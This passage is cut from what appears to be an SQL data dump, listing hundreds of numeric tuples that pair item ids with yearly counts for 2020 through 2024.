',117),(472,3,'2020',121),(2558,3,'2020',122),(3081,3,'2020',122),(1715,3,'2020',124),(482,3,'2020',125),(3066,3,'2020',125),(479,3,'2020',126),(3107,3,'2020',126),(3104,3,'2020',127),(1711,3,'2020',128),(3023,3,'2020',128),(1705,3,'2020',130),(478,3,'2020',132),(1590,3,'2020',132),(3004,3,'2020',133),(1697,3,'2020',134),(2965,3,'2020',134),(3109,3,'2020',134),(2704,3,'2020',135),(3041,3,'2020',135),(3102,3,'2020',135),(483,3,'2020',138),(488,3,'2020',138),(2748,3,'2020',138),(467,3,'2020',139),(1602,3,'2020',139),(1610,3,'2020',139),(485,3,'2020',140),(1584,3,'2020',141),(2296,3,'2020',141),(480,3,'2020',143),(1734,3,'2020',144),(2150,3,'2020',144),(1544,3,'2020',145),(2293,3,'2020',145),(1739,3,'2020',146),(477,3,'2020',147),(1612,3,'2020',147),(3006,3,'2020',147),(484,3,'2020',148),(1709,3,'2020',148),(1707,3,'2020',150),(481,3,'2020',151),(1747,3,'2020',151),(1751,3,'2020',151),(1768,3,'2020',151),(1776,3,'2020',151),(1780,3,'2020',152),(1770,3,'2020',153),(2156,3,'2020',153),(1703,3,'2020',155),(1778,3,'2020',155),(2161,3,'2020',155),(2991,3,'2020',156),(1608,3,'2020',157),(2252,3,'2020',157),(1695,3,'2020',158),(1699,3,'2020',158),(1749,3,'2020',158),(1745,3,'2020',159),(3005,3,'2020',159),(1732,3,'2020',160),(1772,3,'2020',160),(469,3,'2020',161),(1720,3,'2020',161),(1741,3,'2020',161),(1782,3,'2020',161),(2154,3,'2020',163),(2993,3,'2020',163),(3090,3,'2020',163),(1726,3,'2020',164),(1743,3,'2020',164),(2063,3,'2020',164),(1724,3,'2020',165),(2248,3,'2020',165),(2809,3,'2020',165),(2165,3,'2020',167),(1701,3,'2020',168),(2297,3,'2020',168),(2152,3,'2020',169),(2617,3,'2020',171),(1774,3,'2020',172),(1728,3,'2020',174),(3027,3,'2020',174),(471,3,'2020',175),(1713,3,'2020',175),(1737,3,'2020',176),(1592,3,'2020',177),(3038,3,'2020',178),(3060,3,'2020',178),(1596,3,'2020',179),(2159,3,'2020',180),(2178,3,'2020',180),(1766,3,'2020',181),(2775,3,'2020',181),(3045,3,'2020',182),(1594,3,'2020',183),(2148,3,'2020',186),(2804,3,'2020',188),(2911,3,'2020',188),(487,3,'2020',189),(468,3,'2020',190),(1598,3,'2020',191),(2989,3,'2020',195),(3034,3,'2020',195),(470,3,'2020',200),(1722,3,'2020',202),(474,3,'2020',204),(486,3,'2020',204),(1718,3,'2020',207),(3069,3,'2020',209),(2956,3,'2020',220),(570,3,'2020',230),(1586,3,'2020',232),(473,3,'2020',237),(3030,3,'2020',252),(2769,3,'2020',254),(2658,3,'2020',264),(2813,3,'2020',266),(1582,3,'2020',282),(1606,3,'2020',288),(2457,3,'2020',295),(1614,3,'2020',326),(1730,3,'2020',327),(2751,3,'2020',335),(1604,3,'2020',340),(2801,3,'2020',344),(1588,3,'2020',496),(2609,3,'2020',509),(1600,3,'2020',674),(2309,3,'2020',690),(4514,3,'2021',30),(4517,3,'2021',33),(4520,3,'2021',37),(4524,3,'2021',38),(4408,3,'2021',54),(4404,3,'2021',56),(4529,3,'2021',56),(4357,3,'2021',58),(4387,3,'2021',58),(4428,3,'2021',60),(106,3,'2021',61),(4432,3,'2021',63),(110,3,'2021',64),(4377,3,'2021',64),(4424,3,'2021',64),(4444,3,'2021',64),(4440,3,'2021',65),(4373,3,'2021',69),(4382,3,'2021',69),(4329,3,'2021',71),(4412,3,'2021',73),(4420,3,'2021',73),(4436,3,'2021',75),(4448,3,'2021',75),(4363,3,'2021',76),(4368,3,'2021',76),(4396,3,'2021',78),(4391,3,'2021',80),(4416,3,'2021',80),(4323,3,'2021',87),(4301,3,'2021',88),(3727,3,'2021',91),(3738,3,'2021',96),(4338,3,'2021',97),(4275,3,'2021',99),(3721,3,'2021',102),(3731,3,'2021',114),(4332,3,'2021',114),(4326,3,'2021',119),(4454,3,'2021',120),(3735,3,'2021',127),(4238,3,'2021',134),(3749,3,'2021',137),(4335,3,'2021',139),(3724,3,'2021',147),(4341,3,'2021',152),(3752,3,'2021',153),(3774,3,'2021',161),(4400,3,'2021',162),(3249,3,'2021',174),(3771,3,'2021',175),(3124,3,'2021',181),(3297,3,'2021',183),(3229,3,'2021',184),(3746,3,'2021',186),(1705,3,'2021',187),(3269,3,'2021',188),(2293,3,'2021',190),(3096,3,'2021',191),(3275,3,'2021',191),(3742,3,'2021',191),(2152,3,'2021',194),(3240,3,'2021',194),(3265,3,'2021',194),(2993,3,'2021',195),(1782,3,'2021',196),(3777,3,'2021',196),(2748,3,'2021',197),(2252,3,'2021',198),(1751,3,'2021',199),(1772,3,'2021',201),(2965,3,'2021',203),(3316,3,'2021',204),(483,3,'2021',206),(1732,3,'2021',206),(1743,3,'2021',207),(2964,3,'2021',207),(3247,3,'2021',207),(102,3,'2021',208),(3263,3,'2021',208),(3273,3,'2021',208),(1768,3,'2021',209),(1780,3,'2021',209),(479,3,'2021',210),(482,3,'2021',210),(3090,3,'2021',210),(1739,3,'2021',212),(2156,3,'2021',213),(2991,3,'2021',217),(3257,3,'2021',218),(3271,3,'2021',218),(3066,3,'2021',219),(1699,3,'2021',220),(1701,3,'2021',222),(1730,3,'2021',222),(3278,3,'2021',222),(1703,3,'2021',224),(1713,3,'2021',225),(3259,3,'2021',225),(3267,3,'2021',225),(4457,3,'2021',225),(1745,3,'2021',226),(1711,3,'2021',228),(481,3,'2021',229),(2063,3,'2021',229),(1715,3,'2021',230),(1697,3,'2021',231),(1749,3,'2021',231),(3097,3,'2021',231),(1737,3,'2021',233),(3023,3,'2021',233),(1734,3,'2021',235),(3006,3,'2021',235),(480,3,'2021',236),(476,3,'2021',237),(488,3,'2021',237),(1707,3,'2021',237),(3243,3,'2021',238),(3438,3,'2021',238),(1720,3,'2021',241),(3104,3,'2021',242),(3253,3,'2021',243),(1722,3,'2021',244),(3027,3,'2021',244),(3107,3,'2021',244),(3004,3,'2021',246),(3092,3,'2021',247),(485,3,'2021',248),(1747,3,'2021',249),(1695,3,'2021',250),(1776,3,'2021',250),(2296,3,'2021',250),(3109,3,'2021',250),(3245,3,'2021',252),(2558,3,'2021',253),(1741,3,'2021',254),(2165,3,'2021',254),(3290,3,'2021',254),(3041,3,'2021',255),(2150,3,'2021',258),(471,3,'2021',259),(3430,3,'2021',261),(486,3,'2021',263),(1709,3,'2021',263),(3261,3,'2021',263),(3479,3,'2021',266),(3251,3,'2021',267),(484,3,'2021',268),(2161,3,'2021',268),(3063,3,'2021',269),(478,3,'2021',271),(1590,3,'2021',271),(1770,3,'2021',271),(2248,3,'2021',272),(3038,3,'2021',273),(1778,3,'2021',274),(3079,3,'2021',275),(3087,3,'2021',275),(3280,3,'2021',276),(2956,3,'2021',277),(477,3,'2021',280),(2178,3,'2021',281),(3313,3,'2021',281),(3714,3,'2021',281),(3034,3,'2021',284),(3307,3,'2021',284),(2148,3,'2021',292),(3486,3,'2021',292),(1584,3,'2021',295),(2154,3,'2021',295),(3226,3,'2021',295),(1724,3,'2021',296),(2801,3,'2021',298),(3102,3,'2021',299),(3117,3,'2021',300),(3482,3,'2021',304),(2658,3,'2021',309),(1726,3,'2021',311),(3072,3,'2021',312),(2751,3,'2021',313),(2804,3,'2021',313),(2775,3,'2021',317),(1774,3,'2021',318),(2911,3,'2021',319),(1766,3,'2021',326),(2989,3,'2021',328),(2617,3,'2021',340),(469,3,'2021',363),(1728,3,'2021',364),(474,3,'2021',365),(2809,3,'2021',370),(3710,3,'2021',371),(1610,3,'2021',386),(3127,3,'2021',387),(3069,3,'2021',393),(487,3,'2021',394),(2297,3,'2021',407),(472,3,'2021',408),(3060,3,'2021',422),(2813,3,'2021',428),(473,3,'2021',431),(3005,3,'2021',432),(3498,3,'2021',432),(470,3,'2021',433),(467,3,'2021',440),(2704,3,'2021',451),(468,3,'2021',455),(3489,3,'2021',456),(570,3,'2021',459),(1718,3,'2021',468),(3045,3,'2021',475),(2609,3,'2021',483),(3083,3,'2021',483),(3541,3,'2021',494),(3287,3,'2021',518),(3531,3,'2021',522),(3285,3,'2021',531),(1592,3,'2021',532),(3534,3,'2021',545),(1544,3,'2021',567),(1612,3,'2021',574),(2769,3,'2021',605),(3282,3,'2021',620),(2159,3,'2021',632),(1596,3,'2021',636),(1604,3,'2021',659),(74,3,'2021',662),(2457,3,'2021',678),(1614,3,'2021',685),(3030,3,'2021',685),(335,3,'2021',692),(1608,3,'2021',758),(1606,3,'2021',773),(1588,3,'2021',799),(1598,3,'2021',810),(84,3,'2021',814),(108,3,'2021',828),(1582,3,'2021',884),(2503,3,'2021',957),(87,3,'2021',1025),(76,3,'2021',1052),(72,3,'2021',1145),(1594,3,'2021',1146),(89,3,'2021',1183),(2309,3,'2021',1209),(68,3,'2021',1282),(1600,3,'2021',1328),(3781,3,'2021',1350),(3764,3,'2021',1385),(91,3,'2021',1426),(1602,3,'2021',1931),(1586,3,'2021',1972),(2904,3,'2021',2434),(80,3,'2021',2584),(9,3,'2021',29142),(5248,3,'2022',17),(5024,3,'2022',64),(5020,3,'2022',65),(5157,3,'2022',66),(4858,3,'2022',67),(5042,3,'2022',68),(5146,3,'2022',69),(5153,3,'2022',69),(4883,3,'2022',70),(5050,3,'2022',72),(4878,3,'2022',74),(5037,3,'2022',75),(4866,3,'2022',76),(5067,3,'2022',76),(4893,3,'2022',77),(5054,3,'2022',77),(5033,3,'2022',80),(5046,3,'2022',80),(4862,3,'2022',81),(4870,3,'2022',81),(5140,3,'2022',81),(106,3,'2022',85),(4792,3,'2022',86),(110,3,'2022',88),(4888,3,'2022',88),(4797,3,'2022',90),(4897,3,'2022',91),(5058,3,'2022',91),(4802,3,'2022',93),(4874,3,'2022',94),(5080,3,'2022',94),(5028,3,'2022',96),(5122,3,'2022',97),(4977,3,'2022',101),(4741,3,'2022',104),(5062,3,'2022',106),(5071,3,'2022',110),(4980,3,'2022',114),(5101,3,'2022',116),(4744,3,'2022',117),(5128,3,'2022',117),(4750,3,'2022',120),(5125,3,'2022',121),(4983,3,'2022',124),(5076,3,'2022',126),(5131,3,'2022',129),(4753,3,'2022',131),(4756,3,'2022',132),(4747,3,'2022',133),(4688,3,'2022',134),(4668,3,'2022',135),(4681,3,'2022',135),(4648,3,'2022',139),(4976,3,'2022',140),(5137,3,'2022',140),(4988,3,'2022',144),(2293,3,'2022',146),(4759,3,'2022',149),(1734,3,'2022',153),(1705,3,'2022',154),(3249,3,'2022',154),(3247,3,'2022',156),(4996,3,'2022',158),(4712,3,'2022',159),(1747,3,'2022',161),(5134,3,'2022',161),(2156,3,'2022',162),(4591,3,'2022',165),(3096,3,'2022',166),(4762,3,'2022',166),(1699,3,'2022',167),(4608,3,'2022',168),(4357,3,'2022',170),(2063,3,'2022',171),(3265,3,'2022',171),(3269,3,'2022',172),(3259,3,'2022',173),(3727,3,'2022',173),(4768,3,'2022',174),(1751,3,'2022',175),(1782,3,'2022',175),(3257,3,'2022',177),(1697,3,'2022',178),(2993,3,'2022',178),(1739,3,'2022',179),(3097,3,'2022',179),(1730,3,'2022',180),(3287,3,'2022',181),(3738,3,'2022',181),(4382,3,'2022',181),(1713,3,'2022',182),(3240,3,'2022',182),(2252,3,'2022',183),(3273,3,'2022',183),(1732,3,'2022',184),(4368,3,'2022',184),(2161,3,'2022',185),(3092,3,'2022',185),(3109,3,'2022',185),(4612,3,'2022',185),(3275,3,'2022',187),(4373,3,'2022',187),(1749,3,'2022',188),(1720,3,'2022',189),(3229,3,'2022',189),(3541,3,'2022',189),(4776,3,'2022',189),(1743,3,'2022',190),(1780,3,'2022',193),(3271,3,'2022',193),(2248,3,'2022',194),(3243,3,'2022',194),(4363,3,'2022',194),(3280,3,'2022',195),(1701,3,'2022',196),(3079,3,'2022',196),(4765,3,'2022',196),(4387,3,'2022',197),(1772,3,'2022',198),(4377,3,'2022',198),(5163,3,'2022',199),(1768,3,'2022',201),(1776,3,'2022',201),(3278,3,'2022',201),(2965,3,'2022',202),(4408,3,'2022',202),(3263,3,'2022',203),(3297,3,'2022',205),(3749,3,'2022',206),(4587,3,'2022',206),(2150,3,'2022',207),(3267,3,'2022',207),(4396,3,'2022',207),(1695,3,'2022',208),(1726,3,'2022',209),(4685,3,'2022',209),(2748,3,'2022',213),(2991,3,'2022',213),(3486,3,'2022',213),(1778,3,'2022',214),(3245,3,'2022',214),(3034,3,'2022',215),(3714,3,'2022',215),(102,3,'2022',216),(1707,3,'2022',216),(1703,3,'2022',217),(2178,3,'2022',217),(4275,3,'2022',217),(4771,3,'2022',217),(3253,3,'2022',218),(3735,3,'2022',218),(483,3,'2022',219),(1711,3,'2022',219),(4546,3,'2022',219),(480,3,'2022',220),(4440,3,'2022',221),(3261,3,'2022',222),(2152,3,'2022',223),(2558,3,'2022',223),(3226,3,'2022',223),(3531,3,'2022',224),(4691,3,'2022',224),(484,3,'2022',225),(1709,3,'2022',225),(1774,3,'2022',225),(1770,3,'2022',226),(3721,3,'2022',226),(4432,3,'2022',226),(3251,3,'2022',227),(4332,3,'2022',227),(4424,3,'2022',227),(481,3,'2022',228),(1741,3,'2022',228),(1745,3,'2022',228),(4329,3,'2022',228),(476,3,'2022',229),(2956,3,'2022',229),(3777,3,'2022',229),(1715,3,'2022',230),(3282,3,'2022',230),(478,3,'2022',231),(3041,3,'2022',231),(3087,3,'2022',231),(4697,3,'2022',232),(1737,3,'2022',234),(3731,3,'2022',234),(3774,3,'2022',234),(2148,3,'2022',235),(3107,3,'2022',236),(3771,3,'2022',236),(4428,3,'2022',236),(488,3,'2022',237),(4556,3,'2022',237),(3104,3,'2022',238),(3285,3,'2022',238),(4436,3,'2022',238),(1590,3,'2022',239),(4341,3,'2022',239),(3430,3,'2022',240),(2989,3,'2022',241),(479,3,'2022',242),(2964,3,'2022',243),(3724,3,'2022',243),(4404,3,'2022',243),(482,3,'2022',244),(4651,3,'2022',244),(3438,3,'2022',248),(4444,3,'2022',248),(4722,3,'2022',248),(2296,3,'2022',249),(3307,3,'2022',249),(3534,3,'2022',249),(485,3,'2022',250),(2154,3,'2022',251),(3124,3,'2022',251),(2165,3,'2022',252),(3290,3,'2022',252),(4301,3,'2022',252),(4930,3,'2022',254),(2751,3,'2022',256),(3023,3,'2022',256),(3498,3,'2022',258),(2775,3,'2022',260),(3316,3,'2022',262),(4703,3,'2022',263),(4514,3,'2022',264),(4448,3,'2022',266),(4517,3,'2022',268),(3038,3,'2022',270),(3006,3,'2022',271),(3482,3,'2022',272),(2617,3,'2022',277),(4674,3,'2022',281),(3489,3,'2022',282),(3752,3,'2022',282),(2801,3,'2022',284),(4694,3,'2022',284),(4542,3,'2022',285),(1718,3,'2022',286),(4391,3,'2022',287),(4454,3,'2022',287),(4657,3,'2022',288),(3746,3,'2022',291),(471,3,'2022',294),(3090,3,'2022',295),(4709,3,'2022',295),(4654,3,'2022',296),(4700,3,'2022',296),(3045,3,'2022',299),(1584,3,'2022',300),(2658,3,'2022',300),(4706,3,'2022',301),(486,3,'2022',302),(1724,3,'2022',302),(2704,3,'2022',306),(4677,3,'2022',306),(1592,3,'2022',307),(4551,3,'2022',307),(4566,3,'2022',307),(3004,3,'2022',309),(2911,3,'2022',311),(1766,3,'2022',315),(3102,3,'2022',317),(3479,3,'2022',318),(4238,3,'2022',324),(474,3,'2022',325),(3710,3,'2022',326),(4660,3,'2022',327),(4663,3,'2022',330),(4323,3,'2022',332),(477,3,'2022',334),(473,3,'2022',335),(3072,3,'2022',345),(2609,3,'2022',346),(1728,3,'2022',355),(3005,3,'2022',355),(3083,3,'2022',355),(4416,3,'2022',358),(4645,3,'2022',359),(467,3,'2022',360),(1604,3,'2022',366),(3027,3,'2022',366),(4420,3,'2022',366),(1722,3,'2022',369),(2297,3,'2022',375),(487,3,'2022',378),(2813,3,'2022',378),(4326,3,'2022',380),(3063,3,'2022',382),(470,3,'2022',384),(472,3,'2022',385),(3313,3,'2022',390),(3742,3,'2022',391),(2769,3,'2022',397),(4412,3,'2022',397),(4335,3,'2022',400),(468,3,'2022',406),(570,3,'2022',408),(3066,3,'2022',409),(2804,3,'2022',410),(4338,3,'2022',412),(2159,3,'2022',414),(4400,3,'2022',415),(3117,3,'2022',427),(4524,3,'2022',427),(74,3,'2022',431),(2457,3,'2022',433),(3127,3,'2022',439),(4582,3,'2022',445),(4529,3,'2022',459),(1614,3,'2022',463),(3060,3,'2022',466),(469,3,'2022',506),(3069,3,'2022',513),(335,3,'2022',518),(2809,3,'2022',538),(1610,3,'2022',573),(1606,3,'2022',582),(1588,3,'2022',610),(1598,3,'2022',621),(2503,3,'2022',627),(108,3,'2022',630),(4520,3,'2022',632),(84,3,'2022',633),(2309,3,'2022',642),(1608,3,'2022',656),(1612,3,'2022',657),(87,3,'2022',659),(1596,3,'2022',664),(3764,3,'2022',709),(3781,3,'2022',739),(4457,3,'2022',744),(3030,3,'2022',791),(76,3,'2022',823),(1544,3,'2022',872),(1600,3,'2022',889),(1582,3,'2022',927),(91,3,'2022',938),(1594,3,'2022',993),(89,3,'2022',1001),(1602,3,'2022',1084),(68,3,'2022',1170),(72,3,'2022',1557),(1586,3,'2022',1731),(2904,3,'2022',2087),(80,3,'2022',3332),(9,3,'2022',34387),(5383,3,'2023',8),(5378,3,'2023',9),(5374,3,'2023',14),(106,3,'2023',52),(5363,3,'2023',60),(110,3,'2023',69),(3269,3,'2023',89),(3541,3,'2023',92),(4797,3,'2023',92),(1720,3,'2023',93),(3249,3,'2023',93),(4591,3,'2023',93),(4792,3,'2023',94),(3280,3,'2023',95),(4408,3,'2023',95),(3265,3,'2023',96),(2252,3,'2023',97),(4382,3,'2023',97),(4440,3,'2023',97),(4883,3,'2023',97),(5020,3,'2023',98),(2993,3,'2023',99),(1705,3,'2023',100),(3109,3,'2023',100),(1732,3,'2023',101),(3267,3,'2023',101),(3727,3,'2023',101),(4368,3,'2023',101),(5330,3,'2023',101),(1734,3,'2023',102),(4275,3,'2023',102),(4858,3,'2023',102),(4862,3,'2023',102),(1782,3,'2023',103),(1697,3,'2023',104),(1730,3,'2023',104),(3097,3,'2023',104),(3278,3,'2023',104),(1747,3,'2023',105),(1780,3,'2023',106),(3096,3,'2023',107),(4428,3,'2023',107),(4546,3,'2023',107),(4802,3,'2023',107),(1713,3,'2023',108),(1739,3,'2023',108),(2063,3,'2023',108),(1715,3,'2023',109),(3104,3,'2023',109),(3749,3,'2023',109),(4432,3,'2023',109),(1695,3,'2023',110),(1699,3,'2023',110),(1743,3,'2023',110),(3087,3,'2023',110),(4668,3,'2023',110),(2150,3,'2023',111),(2248,3,'2023',111),(4373,3,'2023',111),(4424,3,'2023',111),(4878,3,'2023',111),(1707,3,'2023',113),(2156,3,'2023',113),(3774,3,'2023',113),(4396,3,'2023',113),(4870,3,'2023',113),(1741,3,'2023',114),(1768,3,'2023',114),(1776,3,'2023',114),(3259,3,'2023',114),(3316,3,'2023',114),(2161,3,'2023',115),(3275,3,'2023',115),(4387,3,'2023',115),(4648,3,'2023',115),(4897,3,'2023',115),(3282,3,'2023',116),(1726,3,'2023',117),(4888,3,'2023',117),(5028,3,'2023',117),(3257,3,'2023',118),(5326,3,'2023',118),(1749,3,'2023',119),(3243,3,'2023',119),(4377,3,'2023',119),(3261,3,'2023',120),(1772,3,'2023',121),(3271,3,'2023',121),(4514,3,'2023',121),(3287,3,'2023',123),(4688,3,'2023',123),(4893,3,'2023',123),(1751,3,'2023',124),(2293,3,'2023',124),(3041,3,'2023',124),(4404,3,'2023',124),(4651,3,'2023',124),(3229,3,'2023',125),(3247,3,'2023',126),(3253,3,'2023',126),(1701,3,'2023',127),(1709,3,'2023',127),(3724,3,'2023',127),(4329,3,'2023',127),(3731,3,'2023',128),(4691,3,'2023',128),(2991,3,'2023',129),(3273,3,'2023',129),(3438,3,'2023',129),(3746,3,'2023',129),(4712,3,'2023',129),(2748,3,'2023',130),(3240,3,'2023',130),(3263,3,'2023',130),(1778,3,'2023',132),(3430,3,'2023',133),(4685,3,'2023',133),(4750,3,'2023',133),(3027,3,'2023',134),(3297,3,'2023',134),(3531,3,'2023',134),(3742,3,'2023',134),(4741,3,'2023',134),(2558,3,'2023',135),(4357,3,'2023',135),(3771,3,'2023',136),(4400,3,'2023',137),(4517,3,'2023',137),(5289,3,'2023',137),(3063,3,'2023',138),(3738,3,'2023',138),(4681,3,'2023',139),(3285,3,'2023',140),(4582,3,'2023',140),(4744,3,'2023',140),(4332,3,'2023',141),(1590,3,'2023',142),(3482,3,'2023',142),(3752,3,'2023',142),(4756,3,'2023',142),(4866,3,'2023',142),(3127,3,'2023',143),(3714,3,'2023',143),(3721,3,'2023',143),(4363,3,'2023',143),(4566,3,'2023',143),(5042,3,'2023',144),(478,3,'2023',145),(483,3,'2023',145),(3486,3,'2023',145),(5046,3,'2023',145),(2152,3,'2023',146),(3735,3,'2023',146),(5301,3,'2023',146),(3245,3,'2023',147),(5248,3,'2023',148),(482,3,'2023',149),(3479,3,'2023',149),(5024,3,'2023',149),(1737,3,'2023',151),(5037,3,'2023',151),(2964,3,'2023',152),(3079,3,'2023',152),(2965,3,'2023',153),(5050,3,'2023',153),(3307,3,'2023',154),(4326,3,'2023',154),(5153,3,'2023',154),(476,3,'2023',155),(481,3,'2023',155),(5292,3,'2023',156),(3006,3,'2023',157),(4654,3,'2023',157),(4874,3,'2023',157),(102,3,'2023',158),(471,3,'2023',158),(2154,3,'2023',158),(3034,3,'2023',158),(3534,3,'2023',158),(5146,3,'2023',158),(4556,3,'2023',159),(479,3,'2023',160),(2165,3,'2023',160),(4341,3,'2023',160),(2617,3,'2023',161),(5058,3,'2023',161),(3117,3,'2023',162),(3226,3,'2023',162),(3777,3,'2023',163),(4587,3,'2023',163),(5101,3,'2023',163),(5298,3,'2023',163),(4444,3,'2023',164),(4657,3,'2023',164),(3710,3,'2023',165),(5054,3,'2023',165),(485,3,'2023',166),(4747,3,'2023',166),(5067,3,'2023',166),(2956,3,'2023',168),(3072,3,'2023',168),(4983,3,'2023',168),(5157,3,'2023',168),(2297,3,'2023',169),(3251,3,'2023',170),(3124,3,'2023',171),(3313,3,'2023',171),(5295,3,'2023',171),(3023,3,'2023',172),(3498,3,'2023',172),(2296,3,'2023',173),(3092,3,'2023',173),(3038,3,'2023',174),(4660,3,'2023',174),(4762,3,'2023',174),(477,3,'2023',175),(2801,3,'2023',175),(480,3,'2023',176),(3489,3,'2023',176),(4771,3,'2023',176),(1770,3,'2023',177),(4694,3,'2023',177),(4988,3,'2023',178),(1703,3,'2023',179),(3107,3,'2023',179),(5125,3,'2023',179),(5310,3,'2023',179),(2813,3,'2023',180),(4753,3,'2023',180),(488,3,'2023',181),(5137,3,'2023',181),(5353,3,'2023',182),(2751,3,'2023',183),(2148,3,'2023',184),(2178,3,'2023',184),(4697,3,'2023',184),(4768,3,'2023',184),(2989,3,'2023',185),(2911,3,'2023',186),(5140,3,'2023',186),(5271,3,'2023',186),(2775,3,'2023',189),(5323,3,'2023',189),(4323,3,'2023',190),(4542,3,'2023',190),(3045,3,'2023',192),(4524,3,'2023',192),(5259,3,'2023',192),(1774,3,'2023',193),(4703,3,'2023',193),(4722,3,'2023',195),(4996,3,'2023',196),(5356,3,'2023',196),(486,3,'2023',199),(3290,3,'2023',199),(4976,3,'2023',202),(1718,3,'2023',203),(4335,3,'2023',204),(484,3,'2023',205),(5071,3,'2023',205),(1711,3,'2023',206),(5314,3,'2023',206),(4765,3,'2023',207),(1584,3,'2023',208),(5304,3,'2023',208),(4454,3,'2023',211),(5359,3,'2023',211),(4612,3,'2023',212),(4776,3,'2023',213),(4301,3,'2023',215),(5080,3,'2023',216),(3005,3,'2023',218),(4448,3,'2023',219),(4980,3,'2023',219),(4416,3,'2023',223),(5268,3,'2023',224),(5317,3,'2023',224),(1745,3,'2023',226),(5134,3,'2023',227),(4759,3,'2023',230),(5320,3,'2023',231),(3004,3,'2023',236),(4529,3,'2023',236),(5307,3,'2023',239),(1722,3,'2023',241),(2704,3,'2023',241),(2159,3,'2023',244),(4436,3,'2023',245),(467,3,'2023',248),(4977,3,'2023',249),(3090,3,'2023',251),(4420,3,'2023',252),(3102,3,'2023',254),(4391,3,'2023',257),(5122,3,'2023',258),(5264,3,'2023',258),(2609,3,'2023',260),(4338,3,'2023',264),(5062,3,'2023',264),(469,3,'2023',266),(4608,3,'2023',266),(1606,3,'2023',274),(2804,3,'2023',278),(4551,3,'2023',278),(472,3,'2023',284),(1724,3,'2023',285),(1614,3,'2023',287),(4709,3,'2023',288),(4706,3,'2023',290),(2658,3,'2023',292),(5128,3,'2023',293),(570,3,'2023',296),(5280,3,'2023',297),(2769,3,'2023',301),(4663,3,'2023',303),(5334,3,'2023',310),(4700,3,'2023',311),(4238,3,'2023',312),(5076,3,'2023',312),(4674,3,'2023',314),(5276,3,'2023',320),(5253,3,'2023',321),(3069,3,'2023',325),(1766,3,'2023',326),(3060,3,'2023',328),(4677,3,'2023',330),(5131,3,'2023',331),(1604,3,'2023',353),(474,3,'2023',360),(5256,3,'2023',361),(4645,3,'2023',366),(74,3,'2023',372),(5033,3,'2023',380),(3066,3,'2023',385),(2457,3,'2023',389),(487,3,'2023',394),(4412,3,'2023',400),(1592,3,'2023',409),(470,3,'2023',417),(1608,3,'2023',418),(1728,3,'2023',420),(4520,3,'2023',433),(468,3,'2023',440),(1598,3,'2023',453),(108,3,'2023',454),(473,3,'2023',454),(2503,3,'2023',454),(3083,3,'2023',455),(3030,3,'2023',459),(2309,3,'2023',461),(84,3,'2023',464),(2809,3,'2023',488),(87,3,'2023',510),(4930,3,'2023',522),(1600,3,'2023',536),(335,3,'2023',542),(1544,3,'2023',544),(1610,3,'2023',563),(4457,3,'2023',569),(3781,3,'2023',584),(1602,3,'2023',613),(3764,3,'2023',653),(1612,3,'2023',684),(1588,3,'2023',693),(1596,3,'2023',708),(1594,3,'2023',716),(76,3,'2023',737),(91,3,'2023',788),(5163,3,'2023',789),(1582,3,'2023',833),(1586,3,'2023',840),(89,3,'2023',936),(68,3,'2023',1024),(72,3,'2023',1140),(2904,3,'2023',1822),(80,3,'2023',4234),(9,3,'2023',25435),(106,3,'2024',13),(5383,3,'2024',29),(3269,3,'2024',30),(5323,3,'2024',30),(4878,3,'2024',31),(4706,3,'2024',32),(4608,3,'2024',33),(3774,3,'2024',34),(5378,3,'2024',34),(110,3,'2024',35),(4897,3,'2024',35),(4988,3,'2024',35),(5122,3,'2024',36),(3486,3,'2024',37),(3742,3,'2024',37),(4275,3,'2024',37),(4691,3,'2024',37),(5253,3,'2024',37),(5326,3,'2024',37),(1697,3,'2024',38),(1739,3,'2024',38),(3072,3,'2024',38),(3731,3,'2024',38),(3267,3,'2024',39),(3724,3,'2024',39),(3727,3,'2024',39),(3752,3,'2024',39),(4387,3,'2024',39),(4657,3,'2024',39),(4681,3,'2024',39),(4747,3,'2024',39),(4756,3,'2024',39),(5033,3,'2024',39),(5317,3,'2024',39),(3721,3,'2024',40),(4703,3,'2024',40),(4712,3,'2024',40),(4744,3,'2024',40),(4768,3,'2024',40),(4980,3,'2024',40),(102,3,'2024',41),(3735,3,'2024',41),(4424,3,'2024',41),(4428,3,'2024',41),(4688,3,'2024',41),(4753,3,'2024',41),(4797,3,'2024',41),(4858,3,'2024',41),(4862,3,'2024',41),(5134,3,'2024',41),(4408,3,'2024',42),(4893,3,'2024',42),(5042,3,'2024',42),(5320,3,'2024',42),(3273,3,'2024',43),(4373,3,'2024',43),(4668,3,'2024',43),(4883,3,'2024',43),(5058,3,'2024',43),(5153,3,'2024',43),(5271,3,'2024',43),(1741,3,'2024',44),(4440,3,'2024',44),(4741,3,'2024',44),(4802,3,'2024',44),(4870,3,'2024',44),(4888,3,'2024',44),(5280,3,'2024',44),(5363,3,'2024',44),(2156,3,'2024',45),(3316,3,'2024',45),(4514,3,'2024',45),(4556,3,'2024',45),(4587,3,'2024',45),(5037,3,'2024',45),(5298,3,'2024',45),(5304,3,'2024',45),(1778,3,'2024',46),(2296,3,'2024',46),(3240,3,'2024',46),(3313,3,'2024',46),(4436,3,'2024',46),(4546,3,'2024',46),(4660,3,'2024',46),(4976,3,'2024',46),(5259,3,'2024',46),(5295,3,'2024',46),(5307,3,'2024',46),(483,3,'2024',47),(1713,3,'2024',47),(1782,3,'2024',47),(2991,3,'2024',47),(2993,3,'2024',47),(3229,3,'2024',47),(3278,3,'2024',47),(3280,3,'2024',47),(3531,3,'2024',47),(4326,3,'2024',47),(4341,3,'2024',47),(4792,3,'2024',47),(1584,3,'2024',48),(1707,3,'2024',48),(1715,3,'2024',48),(1751,3,'2024',48),(3710,3,'2024',48),(3714,3,'2024',48),(4444,3,'2024',48),(4591,3,'2024',48),(4651,3,'2024',48),(4762,3,'2024',48),(4874,3,'2024',48),(5256,3,'2024',48),(1705,3,'2024',49),(1737,3,'2024',49),(1768,3,'2024',49),(2911,3,'2024',49),(3034,3,'2024',49),(3045,3,'2024',49),(3063,3,'2024',49),(3271,3,'2024',49),(3438,3,'2024',49),(3777,3,'2024',49),(4332,3,'2024',49),(4382,3,'2024',49),(4697,3,'2024',49),(5020,3,'2024',49),(5157,3,'2024',49),(3257,3,'2024',50),(3259,3,'2024',50),(3275,3,'2024',50),(3307,3,'2024',50),(3498,3,'2024',50),(4700,3,'2024',50),(4709,3,'2024',50),(2150,3,'2024',51),(2804,3,'2024',51),(3027,3,'2024',51),(3482,3,'2024',51),(4404,3,'2024',51),(5028,3,'2024',51),(5054,3,'2024',51),(5248,3,'2024',51),(485,3,'2024',52),(486,3,'2024',52),(1747,3,'2024',52),(2704,3,'2024',52),(2989,3,'2024',52),(3251,3,'2024',52),(3282,3,'2024',